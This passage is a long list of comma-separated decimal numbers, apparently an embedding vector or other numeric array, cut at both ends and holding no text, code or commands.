2274955,0.01077753,0.006152718,-0.0036221568,0.017506381,0.024484394,-0.011444914,-0.026748158,-0.022562997,0.038952816,-0.0082115,0.015074465,-0.018447071,-0.027801167,-0.029389195,-0.041230712,0.004913244,-0.00992218,0.008404271,0.0008604793,-0.0511044,0.002574026,0.0042232038,-0.0051718177,0.039094795,0.0081224935,-0.002490092,0.0027752998,-0.025717132,-0.028345156,0.011693211,-0.005180794,-0.01316163,-0.018385375,0.033265892,-0.019366903,-0.0139952,-0.024279902,-0.006838728,-0.00025427146,0.009170734,0.0013293594,-0.00022384152,-0.027103994,0.032252982,0.0057126633,-0.0016699424,-0.0030535609,-0.033666994,0.007703177,0.0065598735,0.0014475205,-0.00020929701,0.0032238145,0.028438576,-0.007546304,-0.0242626,0.0050230077,0.004020247,0.0028995946,0.0042994474,-0.009826823,-0.011834978,0.0029199691,0.036666065,-0.012795574,0.014253468,0.033302985,-0.007851688,-0.00024098349,-0.015074927,-0.010986021,-0.017528491,-0.008612882,0.017825251,-0.030768361,-0.0023016883,-0.0033343285,-0.014847751,0.0060050674,0.00047454552,0.013341008,0.006540308,0.013819355,0.018233186,0.0038482817,-0.024972461,0.0012619259,-0.0022255613,0.0022013965,-0.00039147158,-0.007527045,0.0051545356,-0.0024063166,0.032113705,0.009093239,0.007929771,0.010376076,-0.0093112765,-0.0050446647,0.0013324355,0.02033255,-0.0087411245,0.0076980726,0.020015618,-0.021708332,-0.0046165762,0.016189177,-0.013285936,-0.025994014,-0.051173717,-0.008490642,0.00042889323,0.004997463,0.033403568,-0.0015557373,-0.0001016425,-0.013732996,0.034763295,0.008180479,0.00258073,0.0044631204,0.03000479,-0.015330576,-0.008317105,0.02093165,-0.019098226,0.025309235,-0.0018213935,-0.004619463,0.0026170528,0.0015622377,-0.01737344,0.011460492,-0.009595019,-0.00721669,0.041689284,0.021972071,0.003876465,-0.018292496,-0.025871335,-0.0075183166,-0.015603644,0.0342171,-0.021798542,0.012899319,0.015451235,-0.003932249,-0.03314638,-0.018789772,-0.0084028505,0.01653019,-0.030558737,-0.005349067,-0.015542071,-0.0072706714,-0.005956784,0.002359576,0.0079785315,-0.020526512,0.01016276,0.003255776,0.008028602,0.0042704823,0.008244627,-0.003839789,-0.0019176427,0.019737814,0.013184186,0.0074267644,-0.00016283467,-0.003669567,-0.0073649064,-0.01988857,0.01967141,0.023793736,-0.012075655,0.0042136554,-0.028578475,0.02308995,0.0138824945,0.017113697,0.010074927,-0.004335035,-0.018330103,-0.020546407,0.0034384304,0.0045005484,-0.036793116,0.013311014,-0.012050398,-0.0025632596,0.011517721,0.020038303,-0.016186072,-0.02416603,-0.0034338327,-0.008235259,0.00846529,0.020042624,0.034082476,0.008051223,-0.008809204,0.009534596,0.016985497,0.022303728,-0.010128972,-0.010597798,0.0025425425,-0.017276192,0.0076510324,-0.010257119,-0.0066064713,0.02457612,-0.018359693,-0.0024984065,-0.00007525664,0.020235661,0.024764558,-0.005333921,-0.003010506,-0.011457721,-0.012733055,0.017379684,0.0027843565,0.020578567,0.010614171,-0.025046265,-0.010830316,-0.03278796,0.011589524,0.011108628,-0.017066343,-0.010391304,-0.012395201,-0.0050355284,0.007892536,-0.00694661,0.0009390447,-0.0075341226,-0.010020187,0.009490086,0.013294726,0.033120144,0.01048051,0.016117806,0.005982557,-0.0191191,0.0024484426,0.010386273,0.008277381,-0.014200298,-0.0036820327,0.027882436,-0.004588478,0.00066793174,-0.0037948852,0.028290674,-0.009128881,0.026007455,-0.0012830339,0.044297088,-0.02205674,0.016889693,0.012392594,0.015518866,0.0099885175,0.012561752,0.05469685,0.023100873,0.0045054117,-0.0040530134,0.038766365,0.007404263,0.0022092287,0.02591227,0.025620587,0.005397323,-0.011784238,0.0053174584,-0.010423053,0.031085305,0.034516644,-0.00823736,0.029229837,-0.000116246745,0.0075932266,-0.01592992,-0.0005989703,-0.0051591503,-0.0063416185,-0.0033329981,-0.012877528,0.004862448,0.025869228,-0.028551564,0.026977751,0.007106339,-0.0045678527,-0.0007377223,0.017598096,-0.019611334,0.0028882534,-0.00019358343,-0.007386564,0.0030376646,0.006729515,-0.024882559,0.015005978,0.012721096,-0.012068022,-0.03764355,-0.008734558,0.021494092,0.014403672,-0.016867448,-0.0074117957,-0.010864365,0.0007858236,-0.005418411,-0.010109326,0.010308499,-0.025018575,0.024388993,0.0012912797,-0.0052321935,0.019615501,0.013138311,0.015788088,0.0051705795,0.016548507,0.013508078,0.018588841,-0.0055853045,-0.010405183,-0.00040682429,0.0069247102,-0.0209254,0.006206895,-0.013651644,0.0044506057,-0.017133523,0.009972842,-0.016109169,-0.019345202,0.015999695,-0.019463163,0.024271304,0.002104542,-0.011864819,0.017133558,-0.012015588,0.018534271,0.01683265,-0.0072558974,0.01077241,-0.011200172,-0.03864541,0.0065200953,0.0015333267,0.017829293,0.008342127,-0.007815555,-0.007921591,-0.006301305,-0.0048424755,-0.008683229,-0.0167762,0.018874906,-0.028428638,0.004972432,0.006572835,0.011850503,0.0022937292,-0.02301933,-0.013711331,0.040541295,0.01754628,-0.0013713805,0.00021907274,0.02712368,-0.0052093565,0.01450554,0.04073967,-0.027092034,0.008724701,-0.016593598,0.028529478,-0.0007925615,-0.013167423,0.007032592,0.010608107,0.020268427,0.013018011,-0.011958885,0.010241271,0.01112602,-0.014656496,-0.002394868,0.02605917,-0.002143763,-0.0029814348,0.006254523,-0.0059387796,-0.042236187,-0.008835688,-0.024492592,0.0018729973,-0.014353148,0.002792623,0.000075776596,-0.01771061,-0.013747475,0.012409333,-0.019592129,0.024181793,0.0011445661,0.0053568855,-0.004425228,0.02371587,0.012189048,0.016082563,-0.016445262,0.011371984,-0.008112906,0.011543841,-0.0014061726,-0.0017285841,0.002517514,0.011583988,-0.0018383482,0.00689254,0.026317056,-0.029048853,0.015287704,0.040122252,0.010087694,0.0027729522,0.028924782,-0.0036149444,-0.014126859,-0.02711147,0.0073746587,0.012439667,0.013006036,0.016728774,-0.018049577,-0.0120613575,-0.012250043,-0.03225559,0.05888353,0.013601399,-0.008832868,0.022110825,0.0008285866,-0.004227714,-0.0014933617,-0.0037711908,0.0033582272,-0.000967714,-0.033808526,-0.020405905,-0.0043324395,-0.028475538,-0.006502675,-0.011980807,-0.024988003,-0.016430872,0.021018103,0.014894753,-0.0030242912,-0.020665262,0.0042986223,0.006628203,-0.0013570795,0.018544784,0.011229845,-0.023744242,0.02707544,-0.029832676,-0.005325023,0.0008415179,0.016674448,0.011126647,-0.004945127,0.010709126,0.012243397,-0.016065266,-0.02596086,-0.004065079,0.021328215,-0.0311149,0.05052301,-0.0051504592,0.018065384,-0.0068725934,-0.014363672,-0.006653642,0.0008748758,0.00147345,-0.0010079809,-0.0028005233,-0.014020857,-0.025153438,-0.00905209,-0.0033531247,0.008503533,0.0140471,0.03221402,-0.005865033,0.01158481,-0.017180935,0.0046250043,0.021464815,-0.007443291,-0.00005447306,0.017471878,-0.015079825,0.0014640266,-0.025481444,0.041805305,0.006715777,-0.023485497,0.0021771798,0.010908777,-0.019638613,-0.010888287,0.009319285,0.009037788,0.008109233,0.000051299005,-0.021391468,0.036612894,-0.008529108,-0.039968118,0.013866959,-0.008694237,-0.028372725,0.05093459,-0.006106586,-0.0073501235,-0.0005259098,0.0032797558,0.014444504,0.024178233,0.012128898,0.0013045887,0.03013157,-0.014215527,0.00076431385,-0.004831011,0.010342174,0.005206435,-0.013036289,0.03709855,0.0055331835,-0.013694787,-0.008835794,0.017018609,0.017776752,0.009504127,0.007936929,-0.02782439,0.0061515686,0.010068038,0.020632586,0.0053313025,0.0023348846,-0.018886028,-0.0052777412,-0.006493954,0.016115787,-0.002543144,-0.048798285,0.010623481,0.092548564,-0.0030840833,-0.015107305,0.024327315,-0.00033127065,0.009654913,-0.069454625,0.023078691,0.0021703267,-0.016349353,-0.0021917864,-0.010200258,-0.012098588,0.036699172,0.006012082,-0.017103044,-0.0036442762,-0.009354124,0.001066886,-0.010170922,-0.012841908,0.018016579,-0.01589358,-0.0057491222,-0.049630836,-0.009890494,-0.0059140557,-0.009520394,-0.016259037,-0.023746507,0.00090774393,-0.006617968,0.011381406,0.008368565,0.005127379,0.019127082,-0.009727898,0.020529542,0.011002715,0.01042379,0.011278956,0.015177242,-0.006745188,-0.03850706,-0.099072024,0.02489686,-0.018066397,-0.037915424,0.02401146,-0.018033175,-0.0048927856,-0.0046590734,0.013027559,-0.022416454,-0.0050683147,0.012245232,-0.00009259417,-0.0050134505,-0.0052039074,0.00829304,0.012571083,-0.009743399,-0.012584702,-0.0034329842,0.01003211,-0.008619363,-0.006547456,-0.02514836,-0.015690766,0.0037692746,0.0006880283,0.012595303,-0.021533787,0.0012887755,-0.02910808,0.020790089,-0.021667408,-0.005471202,-0.001988353,-0.02201086,-0.024732213,-0.0032337313,-0.0066378973,0.022075642,-0.023299668,0.004868442,0.00320211,-0.02256309,0.0034301702,0.01237588,0.0068895905,0.02783711,0.01789182,0.004011259,0.01963788,-0.003302282,0.00606182,0.013981587,-0.01998189,0.0091384705,-0.0131941885,-0.019162921,-0.037951402,0.012666772,-0.006611232,-0.035725106,0.0077736457,0.0012843952,0.021425616,-0.006793286,0.02870664,-0.00637214,0.010380172,-0.023933752,-0.0033102226,-0.0037307513,-0.0048515545,-0.019877143,0.0028523554,0.004158399,0.007231139,0.010746711,0.0056094923,-0.0062261983,-0.008821317,-0.011588192,0.011704752,-0.02448551,0.016359828,-0.0074952617,0.015206773,0.008399434,-0.01265427,-0.030137414,0.048023257,-0.025321256,0.009525968,0.0079005705,0.01900021,-0.0023530852,0.03311896,0.003019721,-0.029841878,0.008611201,-0.0006446431,-0.007866426,-0.013041506,0.019045178,-0.00042595604,-0.0049854107,-0.00010058655,-0.0318288,-0.018317208,0.004078303,-0.019187886,0.0059881234,0.013038739,-0.024194041,0.000043802287,-0.019139882,0.016527286,0.0074879527,0.014522021,-0.005295502,-0.014615933,-0.012021249,0.0233621,0.03183474,0.036290046,0.017294195,-0.020706542,-0.00940062,0.00183498,0.0055139796,-0.036169052,0.027305344,-0.011373367,0.02376291,-0.011260738,-0.009392785,-0.018878367,0.0036385427,-0.029917229,0.012139548,0.020412948,0.017446732,0.030863972,0.011470139,0.037054107,-0.02198519,0.03492217,-0.007111328,0.024975881,-0.011114189,-0.009812895,0.009163433,-0.031983174,-0.005519049,0.009660482,0.051543295,0.0013236814,-0.014076656,0.018869609,0.008964576,0.023835966,0.017320009,-0.020029293,0.0035732666,0.0046437136,-0.02208263,-0.0051610884,-0.008004052,0.0020441683,-0.023425646,0.033725485,0.006193626,0.011657296,0.0076299296,0.0053119897,0.021259815,-0.0035164845,-0.0065641725,0.01883267,0.0007810583,0.004616029,-0.015530539,0.021493029,-0.014052212,-0.0009724303,-0.000768957,-0.020196112,0.0012006351,-0.008618306,0.017876355,-0.030050635,0.0042691748,-0.004046186,-0.0010984592,0.006035535,-0.021683592,0.024495136,-0.0072703436,-0.0005277914,-0.011624556,-0.020066036,-0.0062988326,-0.01697091,-0.006215552,0.00423492,0.0068148333,0.0063537317,-0.0043275454,-0.003932664,-0.004286689,-0.0043076575,0.0018670531,-0.0008009948,0.010174954,-0.003734397,0.017071683,-0.029739741,-0.022010593,-0.026655795,-0.005119524,0.0063596084,-0.003403687,-0.0011839136,0.018883191,-0.0010844015,-0.012192309,-0.00013222269,-0.0076911314,0.005910909,-0.0015299789,-0.0021969895,-0.016188685,-0.0072606434,-0.01868592,0.011661085,-0.0035934804,0.01311049,0.010319388,-0.000010918819,-0.029269287,-0.04339664,-0.005230314,0.012516453,-0.0056454963,0.011840568,0.00037043408,-0.012043071,0.018792937,-0.0004936296,0.018434754,0.010146903,0.005296398,0.0033180926,0.009702127,-0.009250555,0.009547122,0.0022064787,0.020450978,-0.046140924,0.01117558,-0.025207069,0.004995218,-0.020440869,0.01060902,0.0015547845,-0.005788556,-0.013364882,0.017515076,-0.023881953,-0.025675101,0.02753505,-0.0066987737,-0.00142893,0.026387751,-0.0059401747,-0.01031657,0.008330274,0.019221121,0.025906445,0.038149606,-0.034309067,0.016214138,0.019807417,-0.015868507,0.020987475,0.00053098524,0.03046527,-0.0065454454,0.015664471,-0.021098923,0.011263665,-0.006381949,0.017101422,0.012481674,0.014522733,-0.008006853,-0.013974742,0.0061596693,-0.010480167,-0.015701959,0.016675273,0.0012625728,0.016128581,-0.014950277,-0.0056171543,-0.03925706,0.0180022,0.012838386,-0.02725272,-0.00718363,-0.008506877,-0.018540816,-0.014286588,-0.019774763,-0.0056957416,-0.0039385697,0.0019227512,0.01504376,-0.0043018744,-0.0030441454,0.01549495,0.028510494,-0.012656887,0.010613666,0.00096328417,0.017893324,-0.027099103,-0.0043161064,-0.020596396,-0.0114796525,-0.00884645,-0.00672126,0.019340605,0.009785777,-0.02255296,0.02784126,0.01776113,-0.0006357951,-0.028591812,-0.0069204373,0.008719905,-0.019147212,0.016685631,-0.0011000774,-0.019109357,0.0053205984,-0.000798726,0.011097223,-0.012929335,-0.01570643,-0.0013440484,0.012650332,-0.017316494,-0.007316392,0.0113568725,0.009824093,0.035888806,-0.011677168,-0.014345086,0.0030876317,0.005840666,0.0035021426,0.002024409,0.014051193,0.011747223,-0.002456183,-0.0007909298,-0.022297472,0.0028104908,0.015079792,-0.03467417,-0.004281429,0.023449635,-0.0041649155,-0.04762183,0.018872727,-0.022293393,-0.0014618447,0.006488958,0.02275819,-0.018499622,-0.0147701595,0.040693372,-0.005716206,-0.017171554,-0.0107874395,0.01574239,0.024305359,-0.010525098,0.020881765,-0.008915445,-0.00514602,-0.008974115,-0.031807248,0.0017151252,0.004950775,0.00569056,-0.023912942,-0.02549704,0.0027716283,-0.022149855,-0.008647549,0.012433556,0.009082998,0.014905775,-0.016979383,0.008410731,-0.042665318,0.0036812953,0.0025472692,-0.015729308,-0.00058344076,0.042063378,0.0007256593,-0.0036326442,0.0040042386,-0.032230906,-0.006419737,0.004367773,0.019378971,0.01961539,0.011914219,0.01675811,0.0008830043,-0.005479223,0.015120625,0.019587478,-0.03385261,0.011261421,-0.004345721,-0.009473374,-0.008902692,-0.024371048,0.010175863,0.020725377,0.009877915,-0.019928556,0.025101818,0.0014619617,-0.004102718,-0.010765775,-0.0017989702,0.026073268,-0.008656269,-0.011623464,0.0028469395,0.0038688683,0.002715412,-0.0011054738,0.00834446,0.02154713,0.00015561009,-0.008150801,0.00400041,0.0019767045,0.015999766,-0.0077809575,0.00581281,0.004056161,0.0031320727,0.015321004,-0.002375521,-0.011367718,-0.013591697,-0.0023952008,-0.025591394,-0.001505706,0.019894602,0.0012091204,0.035129707,-0.0020876294,0.010210299,0.04371545,0.010494593,0.018942134,-0.0025433572,0.004701836,0.011925135,0.0021678447,-0.016152585,-0.006901738,-0.03676927,0.007399409,0.00953286,-0.023484232,0.0035119639,-0.017766107,0.022497052,-0.027959228,-0.0017619239,-0.013360899,-0.023598865,-0.0031137012,-0.018440893,0.0046386966,0.030522862,-0.012492536,-0.054143783,-0.020909054,-0.0026927576,0.015006059,-0.019725911,0.005988822,0.00046064347,-0.031133765,0.006725545,0.014837279,0.022723032,0.017356256,0.0068403557,0.016055832,0.002893515,0.017085366,-0.0037748232,-0.00011272948,0.022999924,-0.0041291337,0.0060935332,-0.0053643063,0.021663522,0.007936835,0.030514905,0.00081196224,-0.009260326,-0.018267108,-0.013835636,0.006363152,0.0073280036,0.0010183536,-0.02201994,0.0069008353,0.00078215415,0.018889403,0.012855628,0.013337742,0.008176833,0.013514432,0.04003795,-0.03226483,-0.024866406,0.014118334,-0.01738392,-0.023058487,-0.0026924799,0.021002699,-0.013730326,-0.005859788,0.017485201,-0.007336925,-0.009916761,0.0019492254,-0.0029363898,0.0055811782,-0.0090750605,0.0054861633,-0.035969596,-0.035854638,-0.004999466,-0.020424085,0.005114823,0.009950521,-0.0017785354,-0.0019329783,0.0070194583,0.020789133,-0.009394036,0.005338105,0.0013764339,-0.015337644,-0.0070601003,0.011239067,0.020656364,-0.0019875725,-0.035961565,0.001056209,-0.015800575,0.00038642768,0.008862298,0.026787154,-0.005470471,0.0009331478,-0.012685491,0.007776777,0.00551397,0.0096814465,0.024140842,-0.009658403,-0.010329535,0.004976921,-0.01705286,-0.0016092724,-0.027376544,-0.070955664,-0.0033329537,0.0071455115,0.014292572,-0.021029744,0.008413676,0.031293686,0.0014603067,0.018039215,0.03219973,-0.004352279,-0.0014629603,-0.016412858,-0.00088793924,-0.015083275,0.010286675,-0.028415613,0.011944393,0.02301619,0.005168356,-0.008672594,0.009048622,-0.012189226,0.0060558957,0.0045574005,0.006888488,-0.001625674,0.025292192,0.02908456,-0.016463205,0.0031659163,0.009158091,-0.013876146,0.0020211837,-0.038026653,0.01747556,-0.012577911,-0.012387275,0.0042884685,0.018596545,0.0015520515,0.026456062,0.010541077,0.0081940275,-0.0054642283,0.005087003,-0.02363787,0.04805787,-0.011020056,0.024663419,-0.011405234,-0.010208177,-0.020641198,0.0018481474,-0.018592376,0.017775217,-0.012892783,0.0139612425,-0.000991589,0.0076554446,-0.0013165693,-0.014410435,-0.0083042,0.0026277641,-0.01882986,0.027412625,0.037233155,0.012084498,-0.0062216683,-0.003903475,0.024553718,0.00618514,0.02354139,-0.014667641,0.03818218,0.002975512,-0.004942204,0.009401265,-0.016395183,0.016172495,-0.0016866078,0.002540487,-0.031061675,0.01904453,-0.042509392,0.011803315,0.0023672455,0.020810226,-0.0082393,-0.0009915913,0.01633793,0.020259136,-0.011759562,0.035822332,0.015476546,0.03540092,0.023855327,-0.014912924,0.0013218488,-0.011963275,0.004257814,-0.023575595,0.004099145,-0.012207598,-0.026937136,0.013874584,0.009400565,-0.03381652,0.018227698,-0.0028417064,0.038377643,0.025419908,-0.012766666,0.015793834,0.008203402,0.00024048769,-0.0023958953,0.0008586841,0.0129815135,-0.014462998,0.015594258,0.016191918,-0.015311912,-0.022750184,-0.0059085786,-0.025860347,-0.025254183,0.013054283,-0.0024562425,-0.020606311,-0.00032747025,0.015851984,0.039754912,-0.00702167,-0.027689744,-0.0034765026,-0.024901869,0.014278013,0.011123583,-0.005963848,-0.007761602,-0.0064201597,-0.005815419,0.0041558584,-0.0051019695,0.004649434,-0.0082655195,-0.018443214,-0.009599331,0.022960702,-0.0019163259,-0.008084778,0.013000917,0.011935321,-0.009628594,-0.0030128143,-0.023230687,0.007001585,-0.03761648,0.0015835651,0.005935577,0.013170373,0.0077545363,0.001426855,0.019037506,-0.0050600143,-0.0148307765,0.012626969,0.0022034855,-0.0073550306,-0.022326956,-0.009738659,0.01822541,-0.050031845,0.015296854,-0.006373702,0.017738145,0.00066180987,0.052791838,0.036262922,-0.020477526,-0.0029436322,-0.002478681,-0.0012691508,0.014944547,0.01357796,-0.0033048303,-0.0037286947,-0.01300791,0.008027083,0.032783587,0.015025685,-0.009965022,-0.019795852,-0.0020431723,-0.023282873,0.0054207603,0.0004245814,0.0039635175,-0.011149156,-0.029869912,0.01393366,-0.0015910194,-0.029798323,0.011214219,-0.005748903,0.00041480994,0.05222504,0.010245323,-0.001685948,-0.012742343,0.03132648,-0.023418207,-0.035232782,0.004084844,0.043650456,-0.026906256,-0.026247377,0.015867284,0.017371412,0.009656278,0.0026754518,0.014207791,0.0039900504,-0.008571926,0.034958646,0.013745909,0.032097653,-0.005203014,-0.008803763,0.014395515,0.024532702,-0.01632095,-0.0019049521,-0.00069557154,0.0055955397,0.005077019,-0.012871513,-0.008259797,-0.015843213,0.020158602,0.0057022306,0.03047791,0.011942209,0.04373652,0.00063306914,-0.022084802,-0.0032885424,0.038751706,0.037787933,-0.011205668,0.0018451096,-0.0038115887,0.008210275,0.023300443,0.0027643635,0.0028773951,-0.0008078756,-0.0010435563,-0.00080624246,-0.032315824,-0.01130242,-0.025101917,0.0137817105,0.019986182,0.020620126,-0.0004917514,-0.030107448,-0.0075140493,0.01460011,-0.012260883,0.007980879,0.003663278,0.0038429166,0.011250257,-0.013819074,0.03225534,-0.03000021,0.012852742,0.002389912,-0.013304327,0.005640327,-0.0125106275,0.018138178,-0.019765249,-0.00074229407,0.023376085,0.020824065,-0.013851969,-0.006761449,-0.0033296614,-0.0062667737,0.013151524,-0.0074194977,0.0040720804,0.012635065,0.026793512,-0.013614882,0.010368346,0.018094985,-0.0061173784,-0.021840904,-0.0030088525,0.008120482,0.02957996,-0.030904444,-0.022225093,0.02301247,-0.027683614,-0.037413288,0.0069063017,0.017258804,-0.0063612415,0.022170803,-0.0021054808,0.0072060567,-0.0031316294,-0.025911583,0.012073598,-0.003791115,-0.0061908183,0.018050455,0.017931022,-0.00084650976,-0.009618638,-0.017120874,0.009848874,0.02747086,-0.015445759,-0.023858393,0.011202125,0.076234885,-0.0078016077,-0.01827377,0.016505085,-0.0057694046,0.030163614,0.041695476,-0.0067704157,0.0070274514,0.008833991,0.019357985,0.01035578,-0.017249318,0.006437621,0.038238,-0.0004569945,0.022538038,0.022159139,0.01407729,-0.0088146785,0.0091751,-0.022520116,-0.017470324,-0.0017953967,0.031213025,-0.03810302,-0.0046566827,0.014642279,0.020352075,-0.016145265,0.011403534,-0.029448397,-0.0014255128,-0.001711354,-0.019557895,-0.012551314,0.025867606,-0.020903323,-0.0022393651,-0.018476387,0.012482533,-0.016028857,-0.023501907,-0.01351884,-0.07255277,0.014830923,0.01390078,-0.009625641,0.06102414,0.008862448,-0.009928126,0.0064048436,-0.011356722,0.015808593,-0.004577284,-0.016639737,0.0020247684,-0.00832163,0.027833994,-0.0073923212,0.005963714,-0.024020776,0.0073124324,-0.011885781,-0.0020035869,-0.008870716,-0.02012932,-0.019239444,0.011806957,-0.016448783,-0.009473252,-0.017094327,0.007097154,0.014065712,-0.0011001814,-0.019747892,-0.011014058,-0.027656518,-0.010430301,0.014934974,0.0009497006,-0.0033094292,0.0017443104,-0.03607012,0.0020304422,-0.011709105,0.023348866,0.011489199,-0.04449666,0.007899449,-0.018279525,0.001260758,-0.01455574,-0.011459329,0.021103095,0.009471635,-0.01066046,0.036936484,0.002117136,-0.0058462913,-0.0016151316,0.0018178587,0.009713997,0.00027589814,-0.00014405379,0.008242766,0.0124920625,-0.024667384,-0.00092940865,-0.014757445,-0.013550047,0.021227608,-0.012634739,0.012031465,0.007094272,-0.025671067,0.011515459,-0.00088713027,0.011126327,-0.001341213,0.008390156,0.005948555,-0.039826293,0.022518504,0.024613554,-0.0062798182,0.00096629345,0.035605293,0.004061584,0.02061666,-0.005925333,0.009389184,-0.009699811,-0.012640095,-0.0061193854,-0.0017890837,0.015166246,-0.012729881,0.011494572,0.00056883664,-0.012078463,0.019026563,-0.01624473,-0.0010239906,-0.021908272,-0.007492936,-0.0008684279,-0.00928747,-0.007931113,-0.012314381,0.0006765627,-0.013650343,-0.015429668,-0.026074564,-0.018738188,0.021417212,0.02733307,0.02002667,0.030710716,0.020057218,-0.012166606,0.019422889,-0.01992445,-0.011569655,-0.012310992,-0.0022995796,-0.017935695,0.023801627,0.040167917,0.0056433193,0.013335612,0.010317296,-0.028167762,0.014962656,0.019462902,0.014916772,0.007942617,0.0069270283,-0.008750605,-0.0064916015,0.007321733,0.028377023,0.009443745,-0.0024695464,0.027557883,-0.016610788,0.010605916,-0.012812919,-0.0044446923,0.029653784,0.019973718,-0.005847334,0.005346481,0.00447887,-0.007919705,-0.005525202,-0.00500626,-0.011810841,-0.023092045,-0.018775035,0.017858421,0.0036853873,-0.015647503,-0.017074334,0.001552463,0.021114321,0.0092295185,-0.013734782,-0.0024454317,0.0022857639,-0.0012709565,-0.0038502165,-0.014800438,0.008716819,-0.008624788,-0.011869125,0.0032597643,-0.0026700536,-0.004970468,0.014616615,0.02101651,0.02213747,0.008024682,0.017894352,-0.060503017,0.0069825198,0.005982943,-0.011003794,0.011525919,-0.009218693,0.011495732,0.014159751,0.014002919,0.008689933,0.029970856,-0.008379372,-0.022508923,-0.0050012646,-0.011468014,-0.023358183,-0.0120178675,-0.015924852,-0.0005796908,0.00027485134,-0.013941458,0.01935233,0.017898923,0.018013367,0.029206838,0.0075215423,-0.020811914,0.028807314,-0.010936892,0.0060674427,-0.017380493,-0.00026764866,0.035848923,0.08538421,0.020563107,-0.019635584,0.00064084155,0.020514557,0.029001197,0.0007555546,-0.022608954,0.0015013667,-0.008018263,0.014978385,-0.01692425,0.019326491,-0.006621183,0.0047059683,0.030244967,0.013147827,-0.0034932224,0.007740004,-0.00008558512,0.028051173,-0.02063146,0.01665014,-0.015630556,0.00805009,-0.06996866,0.028739292,0.0019731377,-0.016341897,0.0017678237,0.0005365775,0.01753409,0.023140637,0.03278833,0.00061809446,0.009198495,0.0050174505,-0.0034966804,-0.0014472418,-0.022634344,0.019463256,0.019061219,-0.0113128945,-0.016091524,-0.0057321982,-0.0038326795,-0.0102880625,0.0058861603,0.016979873,-0.010316475,0.0031902578,0.01591512,0.019710407,0.0046549565,0.031682298,0.005187649,0.010832352,-0.008717928,0.0019168274,-0.0105228,0.013530477,0.0052620554,0.008158706,-0.008869658,-0.004970753,-0.017105523,0.007860898,0.012460797,-0.036224414,-0.014544949,0.015450167,0.027432855,-0.02463,0.036281638,-0.011882557,0.024010304,-0.022478713,-0.009865076,-0.0045010573,-0.017055122,0.023426564,0.007601015,0.018330276,0.026829395,-0.0068048546,-0.0032393157,-0.02050997,0.023444928,-0.0027463173,-0.009246457,-0.01553301,0.0065396586,0.0076674838,0.03017755,-0.011075261,-0.007914815,0.019825678,-0.0137798395,-0.01982942,0.012530895,-0.0007972319,-0.005428963,0.018962605,0.016316526,-0.0021419926,-0.023165122,0.012747791,0.017427698,0.023785312,0.013279814,-0.014769967,-0.009386117,0.008138169,0.004926352,0.027483292,0.050624408,-0.027482433,-0.02037583,0.02023407,-0.016132347,-0.018359076,0.0031533244,0.023154419,0.044057395,-0.0041851164,-0.013262131,-0.032881737,-0.0058592665,-0.009489537,0.001086535,0.019758988,-0.051817365,-0.008937818,0.011513938,-0.006827079,0.0028887538,0.021690866,-0.016055085,0.0014453442,0.0054766373,0.022192469,-0.015395951,-0.0034650103,0.009309409,0.013389549,-0.0028377934,0.008414505,0.000349608,0.002328716,-0.00088281964,-0.002478116,0.020384155,0.015058231,-0.020761643,-0.023166949,-0.009233881,-0.015416548,0.012742892,-0.003928927,0.00398994,-0.0046648723,-0.0023740414,0.00039133354,-0.028152246,0.0318386,0.021498455,0.012115491,0.019567316,0.0063303523,0.03321509,-0.00920239,-0.0076125413,-0.0038897153,0.013191219,-0.009412935,-0.0053805807,0.0036023888,0.023540573,0.028379375,0.0006516993,0.0019385774,0.008350431,-0.01347367,-0.008708374,-0.0033351125,0.010633952,0.012406457,-0.008216909,-0.011194182,0.0142409215,0.0020641068,0.01139824,-0.003755821,0.024436312,0.017055038,0.011533694,-0.013593379,0.027611157,-0.023312775,-0.015307235,0.0019247691,0.0021168296,0.015771102,-0.0058367033,-0.0041298578,0.015617485,-0.0020048232,-0.019874686,-0.00065514527,-0.017958961,0.006892442,-0.015055942,0.008774336,-0.018801069,0.004284666,-0.001096983,-0.0120412195,-0.025429185,-0.0062889913,-0.024037221,-0.007820434,-0.009489661,-0.012281739,0.010905938,-0.0094832275,-0.014835997,-0.027533678,0.0024114724,0.012753509,-0.03832654,0.0017371963,0.012524824,-0.013616961,-0.0049420893,-0.01137806,-0.023799693,0.023425968,0.013893404,0.008531529,0.03579857,0.013181922,0.009968052,-0.0006761574,0.0050225304,-0.0053828163,-0.021955535,-0.014678115,-0.0007944456,0.007981739,0.008388847,-0.045111295,-0.008232941,-0.0090209795,-0.0018192664,-0.03637981,-0.0332198,-0.0010516824,0.026313713,0.030760277,-0.0027541819,0.017807916,0.02831548,-0.0011360109,0.033227652,-0.008877872,0.00047469023,0.007857662,-0.0078027556,-0.033379372,-0.010678793,-0.014772365,0.01572616,-0.0110342065,0.02026984,0.011503029,0.011123059,-0.004483291,0.0033375125,0.0054328036,0.007757709,0.020722196,-0.021881612,0.0017728307,0.01011612,-0.002614043,-0.022067593,0.015401196,0.002719117,0.05551258,-0.03942559,0.011122436,0.0071296,0.0009965801,-0.046646353,0.011657755,-0.004210302,-0.0141299255,-0.010756392,0.002683268,0.0032010886,0.004644698,-0.0066781584,-0.022374524,0.0029270428,-0.01731255,0.01502917,0.02198106,-0.009048957,-0.009288996,0.019424682,-0.0054481938,-0.0035163243,-0.0077093826,-0.00762418,-0.018701239,-0.006473291,0.0016061511,-0.0052695526,-0.01341016,0.018578367,0.03096644,-0.01922397,-0.00553945,0.0057767397,0.0013985949,0.010844742,0.0032920626,-0.040065065,-0.014788404,-0.01405949,0.00034008638,0.0138770295,0.0069716917,-0.04733494,-0.012484772,0.010490764,-0.0070503433,0.13027328,-0.030726975,0.0008026923,0.002974048,0.00960894,-0.031729344,0.0071270885,0.024198655,-0.0042675473,0.029207889,0.014198557,-0.004196875,0.0016044615,0.0032075455,-0.029119527,0.005167277,0.008592706,0.12827274,-0.0030805827,0.010747973,-0.0025831792,-0.014964803,0.0077077304,0.006703791,0.006464857,-0.02741628,-0.004846956,-0.017063804,-0.0004634893,0.0022194874,-0.038810384,0.0063794767,0.005678381,0.006222115,-0.0039293263,-0.0009786956,0.031977054,0.0029914319,-0.014078932,0.0067959535,0.010325417,0.0051446473,-0.0007710959,-0.015036105,0.0053840713,0.008854582,-0.029919866,-0.014506152,-0.01600911,0.037794013,-0.016082074,-0.010676777,-0.01737586,0.042579517,-0.006038099,-0.0033099693,0.016932718,-0.0073332735,-0.031943534,0.014769826,-0.0136424275,0.010907351,-0.0057627712,0.029323058,-0.019831147,0.020411478,-0.012223553,0.021965634,0.0009503599,0.015811572,-0.01005986,-0.0016486429,-0.022369253,-0.019109394,0.029193597,0.011899059,-0.032662172,0.014286156,-0.0023792346,0.009070559,0.029755535,0.021803467,-0.014543596,-0.001828